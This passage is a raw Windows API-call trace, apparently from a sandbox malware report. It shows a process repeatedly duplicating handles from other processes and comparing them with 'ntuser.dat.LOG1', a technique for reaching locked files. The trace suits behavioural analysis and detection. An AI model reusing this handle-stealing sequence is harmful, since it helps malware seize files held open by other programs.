dwProcessId=0x36c) returned 0x1e8 [0161.689] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.690] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.691] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.691] CloseHandle (hObject=0x1e4) returned 1 [0161.691] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.691] CloseHandle (hObject=0x194) returned 1 [0161.691] CloseHandle (hObject=0x1e8) returned 1 [0161.691] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x36c) returned 0x1e8 [0161.691] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.692] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.693] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.693] CloseHandle (hObject=0x1e4) returned 1 [0161.693] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0161.693] CloseHandle (hObject=0x194) returned 1 [0161.693] CloseHandle (hObject=0x1e8) returned 1 [0161.693] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0161.693] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.693] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.694] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.694] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.694] CloseHandle (hObject=0x1e4) returned 1 [0161.694] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.695] CloseHandle (hObject=0x194) returned 1 [0161.695] CloseHandle (hObject=0x1e8) returned 1 [0161.695] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x54c) returned 0x1e8 [0161.695] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.699] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.704] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.704] CloseHandle (hObject=0x1e4) returned 1 [0161.704] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0161.704] CloseHandle (hObject=0x194) returned 1 [0161.704] CloseHandle (hObject=0x1e8) returned 1 [0161.704] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0161.704] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.705] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.706] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.706] CloseHandle (hObject=0x1e4) returned 1 [0161.706] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.706] CloseHandle (hObject=0x194) returned 1 [0161.706] CloseHandle (hObject=0x1e8) returned 1 [0161.706] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x670) returned 0x1e8 [0161.706] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.709] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.713] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.713] CloseHandle (hObject=0x1e4) returned 1 [0161.714] _wcsicmp (_Str1="\\Reference Assemblies", _Str2="\\ntuser.dat.LOG1") returned 4 [0161.714] CloseHandle (hObject=0x194) returned 1 [0161.714] CloseHandle (hObject=0x1e8) returned 1 [0161.714] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0161.714] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.715] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.715] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.716] CloseHandle (hObject=0x1e4) returned 1 [0161.716] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.716] CloseHandle (hObject=0x194) returned 1 [0161.716] CloseHandle (hObject=0x1e8) returned 1 [0161.716] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x78c) returned 0x1e8 [0161.716] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.717] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.718] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.718] CloseHandle (hObject=0x1e4) returned 1 [0161.718] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\ntuser.dat.LOG1") returned -10 [0161.718] CloseHandle (hObject=0x194) returned 1 [0161.718] CloseHandle (hObject=0x1e8) returned 1 [0161.718] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0161.718] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.719] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.720] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.720] CloseHandle (hObject=0x1e4) returned 1 [0161.720] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.720] CloseHandle (hObject=0x194) returned 1 [0161.720] CloseHandle (hObject=0x1e8) returned 1 [0161.720] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c8) returned 0x1e8 [0161.720] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.720] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.721] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.721] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.722] CloseHandle (hObject=0x1e4) returned 1 [0161.722] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.722] CloseHandle (hObject=0x194) returned 1 [0161.722] CloseHandle (hObject=0x1e8) returned 1 [0161.722] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0161.722] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.722] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.723] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.723] CloseHandle (hObject=0x1e4) returned 1 [0161.723] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.723] CloseHandle (hObject=0x194) returned 1 [0161.723] CloseHandle (hObject=0x1e8) returned 1 [0161.723] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1e8 [0161.723] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.724] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.725] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.725] CloseHandle (hObject=0x1e4) returned 1 [0161.725] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.725] CloseHandle (hObject=0x194) returned 1 [0161.725] CloseHandle (hObject=0x1e8) returned 1 [0161.725] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0161.725] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.726] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.727] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.727] CloseHandle (hObject=0x1e4) returned 1 [0161.727] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.727] CloseHandle (hObject=0x194) returned 1 [0161.727] CloseHandle (hObject=0x1e8) returned 1 [0161.727] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7bc) returned 0x1e8 [0161.727] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.728] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.729] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.729] CloseHandle (hObject=0x1e4) returned 1 [0161.729] _wcsicmp (_Str1="\\Windows NT", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.729] CloseHandle (hObject=0x194) returned 1 [0161.729] CloseHandle (hObject=0x1e8) returned 1 [0161.729] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0161.729] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.729] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.730] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.731] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.731] CloseHandle (hObject=0x1e4) returned 1 [0161.731] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.731] CloseHandle (hObject=0x194) returned 1 [0161.731] CloseHandle (hObject=0x1e8) returned 1 [0161.731] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x490) returned 0x1e8 [0161.731] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.732] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.732] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.733] CloseHandle (hObject=0x1e4) returned 1 [0161.733] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0161.733] CloseHandle (hObject=0x194) returned 1 [0161.733] CloseHandle (hObject=0x1e8) returned 1 [0161.733] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0161.733] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.733] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.734] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.734] CloseHandle (hObject=0x1e4) returned 1 [0161.734] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.734] CloseHandle (hObject=0x194) returned 1 [0161.734] CloseHandle (hObject=0x1e8) returned 1 [0161.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6dc) returned 0x1e8 [0161.735] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.735] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.736] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.736] CloseHandle (hObject=0x1e4) returned 1 [0161.736] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.736] CloseHandle (hObject=0x194) returned 1 [0161.736] CloseHandle (hObject=0x1e8) returned 1 [0161.737] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0161.737] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.737] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.738] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.738] CloseHandle (hObject=0x1e4) returned 1 [0161.738] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.738] CloseHandle (hObject=0x194) returned 1 [0161.738] CloseHandle (hObject=0x1e8) returned 1 [0161.738] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x1e8 [0161.738] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.739] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.740] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.740] CloseHandle (hObject=0x1e4) returned 1 [0161.740] _wcsicmp (_Str1="\\Microsoft Visual Studio 8", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.740] CloseHandle (hObject=0x194) returned 1 [0161.740] CloseHandle (hObject=0x1e8) returned 1 [0161.740] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0161.740] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.741] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.741] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.742] CloseHandle (hObject=0x1e4) returned 1 [0161.742] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.742] CloseHandle (hObject=0x194) returned 1 [0161.742] CloseHandle (hObject=0x1e8) returned 1 [0161.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e4) returned 0x1e8 [0161.742] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.743] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.744] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.744] CloseHandle (hObject=0x1e4) returned 1 [0161.744] _wcsicmp (_Str1="\\Windows NT", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.744] CloseHandle (hObject=0x194) returned 1 [0161.744] CloseHandle (hObject=0x1e8) returned 1 [0161.744] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0161.744] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.745] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.746] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.746] CloseHandle (hObject=0x1e4) returned 1 [0161.746] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.746] CloseHandle (hObject=0x194) returned 1 [0161.746] CloseHandle (hObject=0x1e8) returned 1 [0161.746] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x488) returned 0x1e8 [0161.746] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.747] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.748] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.748] CloseHandle (hObject=0x1e4) returned 1 [0161.748] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.748] CloseHandle (hObject=0x194) returned 1 [0161.748] CloseHandle (hObject=0x1e8) returned 1 [0161.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0161.748] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.749] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.750] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.750] CloseHandle (hObject=0x1e4) returned 1 [0161.750] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0161.750] CloseHandle (hObject=0x194) returned 1 [0161.750] CloseHandle (hObject=0x1e8) returned 1 [0161.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x730) returned 0x1e8 [0161.750] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.751] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.758] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.758] CloseHandle (hObject=0x1e4) returned 1 [0161.758] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.758] CloseHandle (hObject=0x194) returned 1 [0161.759] CloseHandle (hObject=0x1e8) returned 1 [0161.759] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x414) returned 0x1e8 [0161.759] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.759] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.761] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.761] CloseHandle 